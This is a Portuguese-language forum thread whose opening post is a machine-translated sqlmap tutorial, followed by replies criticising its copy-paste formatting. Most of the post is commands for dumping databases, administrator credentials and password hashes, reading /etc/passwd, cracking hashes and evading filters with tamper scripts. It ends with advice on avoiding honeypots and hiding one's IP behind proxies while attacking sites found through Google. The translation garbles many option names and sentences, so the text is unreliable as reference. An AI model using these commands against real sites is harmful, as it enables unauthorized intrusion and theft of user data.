antiblock
Rodnia | Alpha & Omega
  • Chatbox

    You don't have permission to chat.
    Load More
Sign in to follow this  
SpierNumad

Sqlmap Injecção Com Amostras

8 posts in this topic

. 1 Comando opção - uDeixe ' s dizer , temos meta algo como :http : //www.domain.com/article.php?id=7Injeção de comandos :$ ./ sqlmap . py - u ""https://123.123.123.123:3128" -- dbs . 6 Comando opção - dbmsSuponha que nós ' re certeza de que o site de destino usa o tipo de banco de dados MySQL . Nós podemos definir isso em o comando com opções - dbms = mysql , de modo que será mais rápido no ataque de injeção , ao invés de girar através de todos os tipos de banco de dados , como A Oracle , MSSQL , etc .Injeção de comandos :$ ./ sqlmap . py - u "http://www.domain.com/article.php?id=7" -- random - agent -- level 2 -- risk 2 -- threads 5 -- batch -- forms -- dbms = mysql -- dbs . 7 Comando opção - D , - T , - C- D : despejo de banco de dados- T : depósito de mesa- C : despejo colunaDeixe ' s dizer que temos o nome do banco de dados como : sitedb .Injeção de comandos :$ ./ sqlmap . py - u "http://www.domain.com/article.php?id=7" -- random - agent -- level 2 -- risk 2 -- threads 5 -- batch - D sitedb - T Esse comando acima irá enumarate tudo tabelas nome de determinado banco de dados que é " sitedb ".Deixe ' s dizer que temos 15 mesas de nome , um deles é : administrador . E nós queremos enumerar para seu nome colunas .Injeção de comandos :$ ./ sqlmap . py - u "http://www.domain.com/article.php?id=7" -- random - agent -- level 2 -- risk 2 -- threads 5 -- batch - D sitedb - T administrador - C Esse comando acima irá enumarate todas as colunas nome de determinado banco de dados que é " sitedb " e mesa " administrador ".Deixe ' s dizer que temos 6 colunas nome , por exemplo : id , admin_id , admin_pass , admin_fullname , admin_mail , admin_level .Nós queremos despejar todos os dados na tabela " administrador ".Injeção de comandos :$ ./ sqlmap . py - u "http://www.domain.com/article.php?id=7" -- random - agent -- level 2 -- risk 2 -- threads 5 -- batch - D sitedb - T administrador - despejo Ou se você quiser despejar apenas determinadas colunas , como " admin_id " e " admin_pass ".Injeção de comandos :$ ./ sqlmap . py - u "http://www.domain.com/article.php?id=7" -- random - agent -- level 2 -- risk 2 -- threads 5 -- batch - D sitedb - T administrador - C admin_id , admin_pass - despejo . 8 Comando opção - respostasEsta opção é útil vry se você quer executar o processo de ataque 100 % automaticamente, sem qualquer intervenção do utilizador .Por exemplo , quando você está descarregando os dados de determinada tabela ( veja a opção de comando 6 acima ), SqlMap irá automaticamente tentar rachar qualquer cadeia que tem formato como " hash de senha ".Por exemplo :Em despejo da mesa " administrador ", você tem 3 linhas de registro , essas são :Admin : 0cc175b9c0f1b6a831c399e269772661gerente : 92eb5ffee6ae2fec3ad71c777531578fstaf : 4a8a08f09d37b73795649038408b5f33Desde que encontrou dados de campo como " 0cc175b9c0f1b6a831c399e269772661 ? que tem como formato MD5 - haxixe , SqlMap vai tentar a quebrá-la automaticamente usando lista de palavras em dir " txt ". Cracking 3 hashes com poucos lista de palavras , levaria um curto tempo . Mas o que se o hashes encontrados são cerca de 10 , 000 registros e a contagem de lista de palavras é mais do que 100 , 000 , 000 linhas ?? Wouldn ' t demorar muito tempo tempo de espera .A melhor idéia é despejar todos os dados em primeiro lugar , em seguida, o processo de craqueamento pode ser feito mais tarde separadamente . Para este propósito , podemos usar opção de comando - respostas , para fazer SqlMap pular " rachar " processo .Injeção de comandos :$ ./ sqlmap . py - u "http://www.domain.com/article.php?id=7" -- random - agent -- level 2 -- risk 2 -- threads 5 -- batch - D sitedb - T administrador - C admin_id , administrador - passar - despejo - respostas = "rachar = N" - resposta = " rachar = N ", tomamos certa especial única seqüência de rachar a questão , que é " de crack ", e que defina -o para " N " = Não .9. Command opção - rubor - sessãoInjeção de comandos :$ ./ sqlmap . py - u "http://www.domain.com/article.php?id=7" -- random - agent -- level 2 -- risk 2 -- threads 5 -- batch -- dbs -- flush - session Esse comando acima irá fazer SqlMap para lavar todas as sessões encontrados a partir de injeção anterior direcionados a determinado site . Isso é muito útil quando você fazer a injeção com T ( Tempo ) de ataque baseado , como às vezes há ' sa ficando para conexão com o site de destino .Mas , tenha cuidado usando - rubor - sessão , como ele irá apagar todas as sessões de injeção e arquivo para esse destino . Esta opção significa que o próximo processo de injeção começará a partir de zero , como se nós nunca injetar o alvo antes .. 10 Comando opção - hex$ ./ sqlmap . py - u "http://www.domain.com/article.php?id=7" -- random - agent -- level 2 -- risk 2 -- threads 5 -- batch - D sitedb - T administrador - C admin_id , administrador - passar - despejo - hex - tecnologia = T Usando - opção hexadecimal é muito útil quando o processo de injeção usa T ( Tempo ) com base . Meios que os dados que estão sendo recuperados são convertidos em HEX ( hexadecimais ) dígitos antes de começar a entregar . Isso também para evitar quaisquer caracteres estranhos que estão sendo recuperados .11. Comando opção - não - elenco" cast " função no MySQL significa , para converter uma seqüência de caracteres para um personagem diferente conjunto .Por exemplo :SELECT CAST ( _latin1 'teste' AS CHAR CHARACTER SET utf8 );Injeção de comandos :$ ./ sqlmap . py - u "http://www.domain.com/article.php?id=7" -- random - agent -- level 2 -- risk 2 -- threads 5 -- batch -- dbs -- no - cast Observe que , nós podemos ' t junção entre - não - elenco e - opção hex . Nós temos que escolher um deles em um comando .12. Comando opção - despejo - todosPara despejar todos os bancos de dados encontrados , mas exclui " information_schema " DB ou excluir DBMS banco de dados do sistema .Injeção de comandos :$ ./ sqlmap . py - u "http://www.domain.com/article.php?id=7" -- random - agent -- level 2 -- risk 2 -- threads 5 -- batch -- dump - all -- exclude - sysdbs . 13 Comando opção - contagemInjeção de comandos :$ ./ sqlmap . py - u "http://www.domain.com/article.php?id=7" -- random - agent -- level 2 -- risk 2 -- threads 5 -- batch - D sitedb - T administrador - contagem Para contar registros / linhas em uma determinada tabela . Muito útil se você quiser verificar quantos registros / linhas em uma tabela antes de despejá-lo .. 14 Comando opção - início , - finalDeixe ' s dizer que encontramos mesa " membro " e há cerca de 24 , 000 registros em que . E nós queremos despejar início do registro " 1000 ? a " 2000 ?.Injeção de comandos :$ ./ sqlmap . py - u "http://www.domain.com/article.php?id=7" -- random - agent -- level 2 -- risk 2 -- threads 5 -- batch - D sitedb - membro T - despejo - respostas = "rachar = N" - começar = 1000 - final = 2000 . 15 Comando opção - pesquisaDeixe ' s dizer que existem cerca de 90 tabelas em um determinado banco de dados , e queremos curta nosso tempo olhando para a tabela contém certas " nome do campo ". Por exemplo : credit_card_type .Injeção de comandos :$ ./ sqlmap . py - u "http://www.domain.com/article.php?id=7" -- random - agent -- level 2 -- risk 2 -- threads 5 -- batch - D sitedb - busca = "credit_card_type" Ele irá procurar através das tabelas inteiras na base de dados " sitedb " e encontrar em nome do campo " credit_card_type ".. 16 Comando opção - atrasoEsta opção - demora algum tempo usado com T ( Tempo ) Tipo de ataque baseado , para evitar atraso conexão de / para o alvo e para obter dados com precisão .Injeção de comandos :$ ./ sqlmap . py - u "http://www.domain.com/article.php?id=7" -- random - agent -- level 2 -- risk 2 -- batch -- dbs -- delay = 5 -- tech = T Observe , quando nós usar - atraso na Hora tipo de ataque baseado , não é nenhuma " linha " que está sendo definido . Tópico é apenas um , por padrão .- atraso = 5 , significa atraso entre um ataque ao próximo ataque é 5 segundos .17. Comando opção - comuns - mesas , - comuns - colunasSuponha que temos o nome do banco de dados " sitedb ", o tipo de banco de dados é MySQL versão 4.0 . Como sabemos que o MySQL versão 4 doesn ' t tem " information_schema " banco de dados do sistema , por isso vai ser difícil de enumerar as tabelas / colunas nome . Nós vamos utilização " fuzzing / bruteforcing " técnica para obter a tabela e nome da coluna .Injeção de comandos :$ ./ sqlmap . py - u "http://www.domain.com/article.php?id=7" -- random - agent -- level 2 -- risk 2 -- threads 5 -- batch - D sitedb - comum - tabelas Esse comando acima irá tentar a Bruteforce para o nome da tabela com base na lista de nomes de tabelas .Deixe ' s dizer que encontrei uma mesa , por exemplo : membro . Mas nós don ' t tem alguma idéia do que o nome da coluna é . Em seguida , vamos bruteforce para o nome da coluna .Injeção de comandos :$ ./ sqlmap . py - u "http://www.domain.com/article.php?id=7" -- random - agent -- level 2 -- risk 2 -- threads 5 -- batch - D sitedb - comum - colunas Esse comando acima irá tentar a Bruteforce para o nome da coluna com base na lista de nomes de colunas .18. Comando opção - sql - shellPara pedir por um comando interativo shell SQL .$ ./ sqlmap . py - u "http://www.domain.com/article.php?id=7" -- random - agent -- level 2 -- risk 2 -- threads 5 -- batch -- sql - shell Ele vai mostrar um comando interativo shell SQL .Por exemplo , nós queremos fazer consulta SQL da tabela " administrador ".> selecione contagem (*) do administrador ;Você também pode usar - sql - consulta diretamente a partir do comando de injeção , por exemplo :$ ./ sqlmap . py - u "http://www.domain.com/article.php?id=7" -- random - agent -- level 2 -- risk 2 -- threads 5 -- batch -- sql - query = "select count (*) from admin " 19. Comando opção - MSF - caminhoPara solicitar uma concha que se refere a MSF ( Metasploit ) Framework . Instale MSF primeiro antes de usar esta opção de comando .Injeção de comandos :$ ./ sqlmap . py - u "http://www.domain.com/article.php?id=7" -- random - agent -- level 2 -- risk 2 -- threads 5 -- batch -- msf - path = "the_MSF_path_where_it_is_installed" 20. Comando opção - arquivo - leiaPara ler qualquer ( legível ) do arquivo no servidor .Injeção de comandos :$ ./ sqlmap . py - u "http://www.domain.com/article.php?id=7" -- random - agent -- level 2 -- risk 2 -- threads 5 -- batch -- file - read = "/etc/passwd" . 21 Comando opção - adulteraçãoPara usar adulteração para o ataque de injeção . Por exemplo , nós queremos dar o ataque de injeção com corda "+" para qualquer caractere de espaço em que . Significa que irá converter todos os espaços com seqüência de "+".Injeção de comandos :$ ./ sqlmap . py - u "http://www.domain.com/article.php?id=7" -- random - agent -- level 2 -- risk 2 -- threads 5 -- batch -- dbs -- tamper adulterar / space2plus . py Para breve o comando de ligação de sabotagem , você pode configurar link de atalho para todos os scripts de adulteração no dir " adulterar ".$ Ln - s adulteração / space2plus . py space2plus . pyFaça o mesmo para outros scripts de adulteração que você quer fazer atalho para ele .. 22 Comando de opção - usuários , - senhas , - papéis , - privilégios , - é - dba- usuários : para enumerar todos os usuários do banco de dados- senhas : para enumerar todos os paswords de banco de dados para cada um dos usuários- funções : para enumerar todas as funções de cada um dos utilizadores- privilégios : para enumerar todos os privilégios para cada um dos usuários- É - dba : para verificar se o usuário do banco de dados atual é um banco de dados Administrador ou nãoInjeção de comandos :$ ./ sqlmap . py - u "http://www.domain.com/article.php?id=7" -- random - agent -- level 2 -- risk 2 -- threads 5 -- batch -- users -- passwords -- roles -- privileges -- is - dba Útil se você deseja verificar se o usuário do banco de dados atual é um DB Administrador ou não , ou para verificar o usuário tem " escrever " privilégio ou não . Se o usuário tem " escrever " privilégio , então poderíamos tem chance de escrever arquivo no servidor . Ele ' s apenas como " mysql_into_outfile " comando .Boa sorte com a sua injecção .Nota :- Se você faz a injeção com SqlMap de VPS ( Virtual Privada Servidor ) e resultados processo do Google , ter cuidado .. às vezes você don ' t perceber que o local de destino que você ' re atacou é um " honeypot ". Ele ' sa armadilha geralmente definida por empresa de segurança ou empresa de monitoramento de internet . Uma vez que você ' re preso em servidor honeypot , ele irá gravar toda a sua injeção / hackear atividades e seu IP . Então , a autoridade empresa vai apresentar para o relatório legal para sua empresa de hospedagem , e você vai ficar de alerta de los muito em breve . Você ' tem sorte se você só ficar alerta , mas se você fazer isso muitas vezes , empresa de hospedagem pode bloquear / suspender o serviço de VPS por causa de atividades ilegais . Então , basta ter cuidado com o alvo que você ' re tentando truque , você pode usar IP proxy para cobrir o seu IP real .

creditos kira

Share this post


Link to post
Share on other sites
antiblock
Elveron

Copy-paste bem executado, as cores de fundo foram removidas.

 

Se possivel adicionar cor aos passos, por exemplo vermelho, para se distinguir do resto.

Share this post


Link to post
Share on other sites

hm.......

fiquei cheia de vontade de ler o tópico , ja vou preparar as minhas cookies , e reservar as proximas 3h para ler *.*

Share this post


Link to post
Share on other sites

não percebo um caralh*

Share this post


Link to post
Share on other sites

às vezes você don ' t perceber

 

Imagem colocada

Share this post


Link to post
Share on other sites

Copy-paste bem executado, as cores de fundo foram removidas.Se possivel adicionar cor aos passos, por exemplo vermelho, para se distinguir do resto.

se não percebes temos penanão é para todos perceber, quem seguir os passos percebe perfeitamente tambem tive de me desenrascar com essa informação

Share this post


Link to post
Share on other sites

se não percebes temos pena

 

Bem, parece que tens alguns problemas para resolver, mas não será comigo que o irás fazer.

 

Segundo, não preciso de entender um "tutorial" mal organizado.

 

Terceiro, acho que membros que fazem copy-paste descarado deviam ser castigados.

 

Quarto, existe um botão chamado editar.

 

Quinto, se double-post não é permitido, nem sei o que dizer com triple.

 

Sexto, se não aceitas críticas de como fazer tutoriais, aprende a faze-los primeiro.

Edited by @Zé (see edit history)

Share this post


Link to post
Share on other sites

se não percebes temos pena

não é para todos perceber, quem seguir os passos percebe perfeitamente

tambem tive de me desenrascar com essa informação

 

Tens é que perceber que triple-post é contras as regras, fica o aviso.

 

 

Posts fundidos

Share this post


Link to post
Share on other sites

Create an account or sign in to comment

You need to be a member in order to leave a comment

Create an account

Sign up for a new account in our community. It's easy!

Register a new account

Sign in

Already have an account? Sign in here.

Sign In Now
Sign in to follow this